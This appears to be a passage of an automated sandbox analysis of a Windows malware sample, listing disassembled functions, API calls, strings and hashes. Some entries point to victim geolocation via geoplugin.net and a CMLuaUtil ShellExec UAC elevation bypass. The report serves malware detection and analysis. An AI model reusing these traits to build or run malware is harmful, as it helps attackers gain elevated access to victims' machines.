                                                                                                                                                    • Instruction Fuzzy Hash: 0B21A135B03219AACB04E7F0DCA5CFE7778AF54200F800159E902A7294EF20BE59CBE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 1569B3A7
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 1569B3BD
                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 1569B3D6
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 1569B41C
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 1569B41F
                                                                                                                                                    Strings
                                                                                                                                                    • http://geoplugin.net/json.gp, xrefs: 1569B3B7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                                                                    • API String ID: 3121278467-91888290
                                                                                                                                                    • Opcode ID: 11906e7e438ad0094e71231761643bd88d9f4dd8367be9be170b47c14e950ce2
                                                                                                                                                    • Instruction ID: dd77c27f25e408d406c9a2e683a19fafab5d09d87df2631b761efa39cb398cac
                                                                                                                                                    • Opcode Fuzzy Hash: 11906e7e438ad0094e71231761643bd88d9f4dd8367be9be170b47c14e950ce2
                                                                                                                                                    • Instruction Fuzzy Hash: 8111C8356063256BD324DA258C88DBB7F9DEF45560F40052DF84592151DF64A804C7F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D0EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156D0C41: _free.LIBCMT ref: 156D0C6A
                                                                                                                                                    • _free.LIBCMT ref: 156D0F48
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156D0F53
                                                                                                                                                    • _free.LIBCMT ref: 156D0F5E
                                                                                                                                                    • _free.LIBCMT ref: 156D0FB2
                                                                                                                                                    • _free.LIBCMT ref: 156D0FBD
                                                                                                                                                    • _free.LIBCMT ref: 156D0FC8
                                                                                                                                                    • _free.LIBCMT ref: 156D0FD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                    • Instruction ID: 08e669040eb848c659cb6e7b3c7086cf1eed2f71e32486907e539307e48b291e
                                                                                                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                    • Instruction Fuzzy Hash: 53116035646708BAD520AB74CC45FCBB7DCEF08750F404C15AAEE67061E6B4F904D6D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156BA35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,156BA351,156B92BE), ref: 156BA368
                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 156BA376
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 156BA38F
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,156BA351,156B92BE), ref: 156BA3E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                    • Opcode ID: d5d7e4d4bf98e930012ef0ce237883aeab9bf5f5ffeaf96d3eada58a08b9c29c
                                                                                                                                                    • Instruction ID: 27776e3ddc46cbdeb5fc5d4e21feb918de867a5cb0b48b3a0a8fb78710b6590e
                                                                                                                                                    • Opcode Fuzzy Hash: d5d7e4d4bf98e930012ef0ce237883aeab9bf5f5ffeaf96d3eada58a08b9c29c
                                                                                                                                                    • Instruction Fuzzy Hash: A501B536B2D3669ED30515789CF5A5E264DEB426F6720032EE414919D4EFE26801D3D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156875B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\fu56fbrtn8.exe), ref: 156875D0
                                                                                                                                                      • Part of subcall function 156874FD: _wcslen.LIBCMT ref: 15687521
                                                                                                                                                      • Part of subcall function 156874FD: CoGetObject.OLE32(?,00000024,156E6518,00000000), ref: 15687582
                                                                                                                                                    • CoUninitialize.OLE32 ref: 15687629
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                    • API String ID: 3851391207-3484095926
                                                                                                                                                    • Opcode ID: 3089ef8c8455ce5cbfb0f1c285d5fb5e3e40d3de5165177b8e12f22c0a2dba7d
                                                                                                                                                    • Instruction ID: 927ad4bbff3ac22643f047b9a56422ffd3d61763ffa99d9b01c3891f97ad02d5
                                                                                                                                                    • Opcode Fuzzy Hash: 3089ef8c8455ce5cbfb0f1c285d5fb5e3e40d3de5165177b8e12f22c0a2dba7d
                                                                                                                                                    • Instruction Fuzzy Hash: BB01DE323063116BE3248A24EC5DFAB374CEF44629F11061EF94186181EB5AAC80C6F0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEAE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DEACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DEAD15
                                                                                                                                                      • Part of subcall function 02DEACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DEAD39
                                                                                                                                                      • Part of subcall function 02DEACF8: GetModuleFileNameA.KERNEL32(02DE0000,?,00000105), ref: 02DEAD54
                                                                                                                                                      • Part of subcall function 02DEACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DEADEA
                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 02DEAEB7
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DEAED4
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEDA
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,02DEAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEEF
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,02DEAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DEAEF5
                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DEAF17
                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DEAF2D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                    • Opcode ID: 793a5ccb39574c72d6c3509b779391c2a61b4e53d434534b837f845699dd3b28
                                                                                                                                                    • Instruction ID: de5e3b23d34b5db56a54b047ccd9345c2587d3abfa96fc49547d9ba320dcc1c9
                                                                                                                                                    • Opcode Fuzzy Hash: 793a5ccb39574c72d6c3509b779391c2a61b4e53d434534b837f845699dd3b28
                                                                                                                                                    • Instruction Fuzzy Hash: CE11CEB6194201AADE00FBA4DC81F8E73EDEB14700F800929B756D62E0DA70ED848F76
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569ADC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 1569ADF2
                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 1569AE00
                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 1569AE07
                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 1569AE10
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                    • String ID: Alarm triggered$`Wu
                                                                                                                                                    • API String ID: 614609389-1738255680
                                                                                                                                                    • Opcode ID: 021d9ec2cd6305426b6f5a59cdde20efeace4cbfb6cfd33714795c6fea8599ad
                                                                                                                                                    • Instruction ID: 3eb53b128005a95a8b223a36a170621c1ff24ca90ee0cec75b81ae9db2c9f7f4
                                                                                                                                                    • Opcode Fuzzy Hash: 021d9ec2cd6305426b6f5a59cdde20efeace4cbfb6cfd33714795c6fea8599ad
                                                                                                                                                    • Instruction Fuzzy Hash: E5E04836F62134379620377A9D4ECBF3D2DDAC2660741055DFD0756145DE102815C7F2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15691CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569179C: SetLastError.KERNEL32(0000000D,15691D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 156917A2
                                                                                                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 15691D37
                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 15691DA5
                                                                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 15691DC9
                                                                                                                                                      • Part of subcall function 15691CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,15691DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 15691CB3
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 15691E10
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 15691E17
                                                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15691F2A
                                                                                                                                                      • Part of subcall function 15692077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15691F37,?,?,?,?,00000000), ref: 156920E7
                                                                                                                                                      • Part of subcall function 15692077: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 156920EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3950776272-0
                                                                                                                                                    • Opcode ID: c736b78091e5c656e2a7b21210db5939c2463bff69c940cbc8f2a0e9e9a0f895
                                                                                                                                                    • Instruction ID: a989928c68e342ce339268b52603bf7d4acc19f15a1c589ccf2b438f37594bd0
                                                                                                                                                    • Opcode Fuzzy Hash: c736b78091e5c656e2a7b21210db5939c2463bff69c940cbc8f2a0e9e9a0f895
                                                                                                                                                    • Instruction Fuzzy Hash: 6B611174B05616EFD7089F25C980B2A7BEABF84350F20411DEC068BB81EB74E846CBD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C58F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4189289331-0
                                                                                                                                                    • Opcode ID: ec9dea24fe271a94d20e120a8acb520807e819e3b5acf82b3ff013990e21c496
                                                                                                                                                    • Instruction ID: f4bc40baeb4fe99ff9cd19ceefa7bc5e5daf37b4a519833922c91c95b0fbc5d0
                                                                                                                                                    • Opcode Fuzzy Hash: ec9dea24fe271a94d20e120a8acb520807e819e3b5acf82b3ff013990e21c496
                                                                                                                                                    • Instruction Fuzzy Hash: FB51FD36A05245ABDB10CBA9CC80F9E77E9FF59331F1042DAE41696291DF35F900CAE8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 1568A740
                                                                                                                                                      • Part of subcall function 1568A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1568A74D), ref: 1568A6AB
                                                                                                                                                      • Part of subcall function 1568A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,1568A74D), ref: 1568A6BA
                                                                                                                                                      • Part of subcall function 1568A675: Sleep.KERNEL32(00002710,?,?,?,1568A74D), ref: 1568A6E7
                                                                                                                                                      • Part of subcall function 1568A675: CloseHandle.KERNEL32(00000000,?,?,?,1568A74D), ref: 1568A6EE
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1568A77C
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 1568A78D
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1568A7A4
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 1568A81E
                                                                                                                                                      • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,156E6468,00000000,00000000,00000000), ref: 1568A927
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3795512280-0
                                                                                                                                                    • Opcode ID: 0120a033857e4422fca1e40a4f8cc03a4462c880ffcb2b25262d21eeb84b1bbb
                                                                                                                                                    • Instruction ID: 26b16f556f9a7af05be4346cfc4549df3342cddcf03c1c7b0966f10a1aec976d
                                                                                                                                                    • Opcode Fuzzy Hash: 0120a033857e4422fca1e40a4f8cc03a4462c880ffcb2b25262d21eeb84b1bbb
                                                                                                                                                    • Instruction Fuzzy Hash: 0851847970A3049BDB08EB30C864ABE77AA5F94214F44091DE993972D0DF74BD09C7E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEE548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DEE5E1
                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DEE5FD
                                                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DEE636
                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DEE6B3
                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DEE6CC
                                                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02DEE701
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 351091851-0
                                                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                    • Instruction ID: 683e95ca6208846ea4f9c9d88d60dcca018203ad0038c7f5c4952f8d136ccfde
                                                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                    • Instruction Fuzzy Hash: 0851E7B59006299BCF22EB58C880BD9B3BEEF49310F0045D5E90AA7351DB71AF85CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C7571 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                    • API String ID: 2936374016-3206640213
                                                                                                                                                    • Opcode ID: 20b997a149a10720fdfd5c21282df33c2ec8be3001a03c66cb13c6e02d2b68e1
                                                                                                                                                    • Instruction ID: 944334307d015f0cc2dd8c73b62d00eb20b14bf6b9f92a898deaa0c0c9db6ab0
                                                                                                                                                    • Opcode Fuzzy Hash: 20b997a149a10720fdfd5c21282df33c2ec8be3001a03c66cb13c6e02d2b68e1
                                                                                                                                                    • Instruction Fuzzy Hash: B2D1D135E0420ACADB15CF68C891BAAB7B5FF05310F1041DEE946AFA54D33DA980CBE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15690E61 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 15690E6E
                                                                                                                                                    • int.LIBCPMT ref: 15690E81
                                                                                                                                                      • Part of subcall function 1568E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1568E0D2
                                                                                                                                                      • Part of subcall function 1568E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1568E0EC
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 15690EC1
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 15690ECA
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 15690EE8
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15690F29
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3815856325-0
                                                                                                                                                    • Opcode ID: 05f2795c7f2f91c60c6eea06ad47a782f9d886e8b942461cdc594ad1c927bffd
                                                                                                                                                    • Instruction ID: eda00c7fc2757e4f52d14b0b7dbe9d80bc60d9ce21a40508b0481a15eba84e71
                                                                                                                                                    • Opcode Fuzzy Hash: 05f2795c7f2f91c60c6eea06ad47a782f9d886e8b942461cdc594ad1c927bffd
                                                                                                                                                    • Instruction Fuzzy Hash: CA21C63AF161149FCB05DB78D8A5C9D77B9AF44230B60025BE451A7280EF71BE41C7D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C8215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
                                                                                                                                                    • _free.LIBCMT ref: 156C824C
                                                                                                                                                    • _free.LIBCMT ref: 156C8274
                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
                                                                                                                                                    • SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
                                                                                                                                                    • _abort.LIBCMT ref: 156C8293
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                    • Opcode ID: a2cd68d45d119d72659a7ce3ce041dbcca702d3339b2d9c3f2c94b61231893e1
                                                                                                                                                    • Instruction ID: 6d6ff60a384005da27db517235797354906932f25c81e1491ce149f9ffad6827
                                                                                                                                                    • Opcode Fuzzy Hash: a2cd68d45d119d72659a7ce3ce041dbcca702d3339b2d9c3f2c94b61231893e1
                                                                                                                                                    • Instruction Fuzzy Hash: 30F0F93A605A506BC37162285C98F5B251EDFC3271F25069EF865A2680EF34B801C1E8
